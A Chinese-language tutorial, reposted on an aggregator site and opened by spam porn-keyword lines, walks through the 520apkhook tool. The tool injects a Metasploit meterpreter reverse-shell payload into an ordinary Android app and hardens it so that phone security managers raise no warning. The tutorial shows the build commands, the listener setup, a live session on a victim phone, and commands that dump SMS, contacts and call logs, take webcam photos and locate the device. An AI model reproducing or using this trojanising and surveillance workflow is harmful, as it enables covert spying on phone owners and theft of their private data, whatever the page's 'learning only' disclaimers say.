国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

利用MSF打包加固APK對安卓手機進行控制

這篇具有很好參考價值的文章主要介紹了利用MSF打包加固APK對安卓手機進行控制。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

介紹

由于經典的MSF生成apk安裝包控制,版本較低,高版本安卓手機可能會出現版本不支持或無法使用的現象,而且apk無法正常使用,沒有圖形化界面,比較假。

  • 相比于原始的msf遠控,此版本app在進行遠控時,被注入的app可以正常運行,原始msf生成的app程序,只在桌面上有一個圖標,點擊后沒有任何app界面。

  • 注入后的app在安裝時,手機管家不會有任何安全提示,原始msf生成的app程序,安裝時手機管家會有安全警示。

項目地址

  • 將msf生成的payload,注入到一個正常的apk文件中,重新打包后進行加固,bypass手機安全管家的檢測。

  • 項目地址:?GitHub - ba0gu0/520apkhook: 把msf生成的安卓遠控附加進普通的app中,并進行加固隱藏特征??梢岳@過常見的手機安全管家。

  • 作者: BaoGuo

重點說明

  • 項目目前由于加固腳本問題, 目前只支持單classes.dex文件操作.

  • 本項目僅用于安全研究, 禁止利用腳本進行攻擊, 使用本腳本產生的一切問題和本人無關.

  • 部分被加固過的app無法進行注入,已測試網易系列,360系列,騰訊系列,其他的請自行測試。

項目依賴

  • 本項目參考以下項目

  • Java層DEX一鍵加固腳本

  • APK Infector

使用

  1. 使用Linux或者macos主機, 安裝python3, openjdk8, metasploit-framework.
  2. 使用python3生成apk文件, 需要指定msf遠控鏈接的IP和端口.

520apkhook安裝,網絡安全,android,網絡安全,安全

cd 520apkhook
python3 hook.py --lhost 192.168.?.? --lport 1433 -n ./base.apk

// --host 指定msf遠控的IP
// --lport 指定msf遠控端口
// -n 指定被注入的apk文件路徑

生成需要指定的msf payload類型

python3 hook.py --lhost 192.168.?.? --lport 1433 -n ./base.apk

[*] 創(chuàng)建隨機字符串,用來修改msf payload!
[+] 生成成功!

[*] 檢查電腦上的開發(fā)環(huán)境
================================

[:] NOTE : 請確認安裝jdk8環(huán)境!

[*] 檢查 : Jdk版本
javac 1.8.0_282
[+] JDK - OK

[*] 檢查 : msfvenom
[+] msfvenom - OK

   ====================================
   [*] Available Types of Payload
   ====================================
   (1) android/meterpreter/reverse_tcp
   (2) android/meterpreter/reverse_http
   (3) android/meterpreter/reverse_https

[?] 選擇msf payload (1/2/3): 1
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10192 bytes
......

apk簽名時需要輸入證書的相關信息

......
[*] 將加固后的dex文件替換apk中的class dex!
'classes.dex'...
[+] 插入成功 !
[+] app加固完成

[*] 創(chuàng)建app簽名文件!
您的名字與姓氏是什么?
 [Unknown]:  123456
您的組織單位名稱是什么?
 [Unknown]:  123456
您的組織名稱是什么?
 [Unknown]:  123456
您所在的城市或區(qū)域名稱是什么?
 [Unknown]:  123456
您所在的省/市/自治區(qū)名稱是什么?
 [Unknown]:  123456
該單位的雙字母國家/地區(qū)代碼是什么?
 [Unknown]:  123456
CN=123456, OU=123456, O=123456, L=123456, ST=123456, C=123456是否正確?
 [否]:  y
......

在生成apk文件后, 目錄下會產生Final_Infected.apkhandler.rc

ls

Final_Infected.apk base.apk           hook.py            libs
Readme.md          handler.rc         images

使用msfconsole加載handler.rc進行服務端監(jiān)聽

msfconsole -r handler.rc

# cowsay++
____________
< metasploit >
------------
      \   ,__,
       \  (oo)____
          (__)    )\
             ||--|| *


      =[ metasploit v6.0.42-dev-b177452c898ad956be8540a40c805bf52310c234]
+ -- --=[ 2124 exploits - 1137 auxiliary - 361 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services

[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (handler.rc)> set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
resource (handler.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (handler.rc)> set LPORT 1433
LPORT => 1433
resource (handler.rc)> set exitonsession false
exitonsession => false
resource (handler.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:1433
msf6 exploit(multi/handler) >
......

將生成的apk文件在安卓手機進行安裝, 即可完成對目標的控制

成功后,可以在msf中進行遠程控制

msf6 exploit(multi/handler) > sessions

Active sessions
===============

 Id  Name  Type                        Information         Connection
 --  ----  ----                        -----------         ----------
 1         meterpreter dalvik/android  u0_a53 @ localhost  192.168.0.21:1433 -> 192.168.0.68:65133 (192.168.16
                                                           4.194)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : localhost
OS          : Android 11 - Linux 5.4.61-********+ (armv81)
Meterpreter : dalvik/android
meterpreter > ls
No entries exist in /data/user/0/com.zhangy.vphone/files
meterpreter > app_list
Application List
================

 Name                                Package                               Running  IsSystem
 ----                                -------                               -------  --------
 Android System WebView              com.android.webview                   false    true
 Android 系統(tǒng)                          android                               false    true
 Android動態(tài)壁紙                         com.android.wallpaper                 false    true
 Arm Pro                             armadillo.studio                      false    false
 Black Hole                          com.android.galaxy4                   false    true
 Bluetooth MIDI Service              com.android.bluetoothmidiservice      false    true
 Call Log Backup/Restore             com.android.calllogbackup             false    true
 CaptivePortalLogin                  com.android.captiveportallogin        false    true
 HTML 查看程序                           com.android.htmlviewer                false    true
 Intent Filter Verification Service  com.android.statementservice          false    true
 KK谷歌助手                              io.kkzs                               false    true
 LOL GG                              com.hpdjyxsziq.sqmezcbpyf             false    false
 Live Wallpaper Picker               com.android.wallpaper.livepicker      false    true
 MT管理器                               bin.mt.plus                           false    false
 ......

一些MSF的常見利用命令

seessions 查看已經獲取的會話

sysinfo 查看目標系統(tǒng)信息

screenshot 屏幕截圖

webcam_list 查看相機列表

webcam_stream 開啟攝像頭

webcam_snap 拍照

dump_calllog 獲取電話

dump_contacts?獲取通訊錄

dump_sms?獲取短信

geolocate 獲取位置

注意:僅供學習測試,不得用于非法或者商業(yè)目的,否則后果自負,所有權及解釋權歸本人所有。文章來源地址http://www.zghlxwxcb.cn/news/detail-794613.html

注意:僅供學習測試,不得用于非法或者商業(yè)目的,否則后果自負,所有權及解釋權歸本人所有。

注意:僅供學習測試,不得用于非法或者商業(yè)目的,否則后果自負,所有權及解釋權歸本人所有。

到了這里,關于利用MSF打包加固APK對安卓手機進行控制的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 安卓多渠道打包(五)360加固walle多渠道打包

    安卓多渠道打包(五)360加固walle多渠道打包

    1、360加固寶,簽名收費了,腳本上傳加固也針對特定帳號才可實現。 本文將會分享安卓項目中,使用360加固,再用walle簽名,產出多渠道加固包的全流程。 win10 jdk11 as2022+ gradle7.5 通過walle獲取加固包的渠道名字正確。 整體思路如下: 項目產出release包–360加固–對齊,簽名–

    2024年02月09日
    瀏覽(32)
  • Kali Linux使用MSF木馬入侵安卓手機

    Kali Linux使用MSF木馬入侵安卓手機

    聲明: 本文章僅做娛樂和學習,切勿非法使用??! 本人技術一般,水平有限,如有不對請多多指正。 Kali Linux 安卓手機一部(安卓11) 要想玩的好,總不能本地玩自己吧,也得和周邊朋友開個玩笑吧,所以就得做內網穿透了,免費內網穿透可以看這位大佬的 CSDN博主「Lisa

    2024年01月24日
    瀏覽(25)
  • uniapp安卓本地打包成apk

    uniapp安卓本地打包成apk

    1.HBuilderX最新版 2.與HBuilderX版本對應版本的“Android 離線SDK - 正式版”, 下載見:https://nativesupport.dcloud.net.cn/AppDocs/download/android.html 3.Android Studio,官方下載地址:https://developer.android.google.cn/studio?hl=zh-cn 4.java1.8環(huán)境 輸入生成證書的命令,格式為: keytool -genkey -alias 證書別名 -k

    2024年01月18日
    瀏覽(86)
  • 安卓APK反編譯+修改+重打包+簽名

    安卓APK反編譯+修改+重打包+簽名

    反編譯工具包地址:百度網盤 提取碼:dsu3 解壓后有四個壓縮包:apktool.rar、dex2jar、jdgui、Auto-Sign; 注意,將反編譯包的路徑改為全英文的,以防發(fā)生意外。 修改APK的后綴名為zip,并解壓。 進入解壓包,得到classes.dex文件。 復制classes.dex文件到dex2jar文件夾中。 在該文件夾中

    2024年02月13日
    瀏覽(30)
  • Unity游戲項目從零打包安卓APK

    Unity游戲項目從零打包安卓APK

    目錄 前言 一、切換到安卓平臺 二、安裝JDK 三、安裝AndriodStudio 四、安裝NDK 五、進入Unity配置 六、關鍵修復 1.設置修改 2.文件修改? 六、打包 總結 記錄當前從零打包安卓APK的環(huán)境配置以及步驟 首先確保項目的開發(fā)適配度,由于我此次做的測試版本沒有做任何適配導致打出來

    2024年02月15日
    瀏覽(25)
  • 安卓手機怎樣安裝apk應用

    安卓手機怎樣安裝apk應用

    以華為手機為例 首先手機要關閉純凈模式,方法: 設置–系統(tǒng)和更新–純凈模式–關閉 然后下載/接收apk文件 (如果是從瀏覽器下載的,可以直接安裝,如果是從其他渠道下載,則安裝方法如下) 打開手機自帶的文件管理app 通過來源找到該文件 單擊后在彈出界面選擇打開

    2024年02月13日
    瀏覽(16)
  • [安卓逆向]apktool實現APK反編譯、重打包、簽名

    [安卓逆向]apktool實現APK反編譯、重打包、簽名

    apktool 主要用于逆向apk文件。它可以將資源解碼,并在修改后可以重新構建它們。 APKtool官網: https://ibotpeaches.github.io/Apktool/ APKtool下載: https://bitbucket.org/iBotPeaches/apktool/downloads/ APKtool源碼: https://github.com/iBotPeaches/Apktool 將 apktool_2.6.1.jar 放到一個文件夾下(如:D:apktool),然

    2024年02月03日
    瀏覽(32)
  • uniapp項目打包(安卓apk和微信小程序)

    uniapp項目打包(安卓apk和微信小程序)

    uniapp的打包方式有很多,這里主要講解App打包成安卓apk和微信小程序的兩種方式 原生App分為云打包和本地打包兩種,一般只推薦使用云打包來快速打包成安卓apk 安卓正式包 勾選使用云端證書時,我們無需手動生成證書別名、證書私鑰密碼、證書文件等,uniapp官方已配置好云

    2024年02月03日
    瀏覽(362)
  • uni-app離線打包安卓apk

    uni-app離線打包安卓apk

    記錄一下打包apk的過程: 參考:uni-app離線打包官網地址 2-1.遇見問題 1. 加載.idea和.gradle失敗, 解決: File → Project Structure 重新構建: File → Sync Project with Gradle Files 安卓結構: Project → Android 登錄開發(fā)者中心選擇需要打包的應用→各平臺信息→查看或新增安卓打包信息 這里

    2024年04月17日
    瀏覽(26)
  • msf使用木馬控制android手機

    msf使用木馬控制android手機

    msf使用木馬控制android手機 kali、手機模擬器(或不用的手機)。 手機模擬器(或者手機)與電腦可以互相連通嗎,即手機可以直接訪問到kali。 命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 android_shell.apk ; 2、手機安裝木馬。 想辦法把木馬放到手機模擬器(

    2024年02月10日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包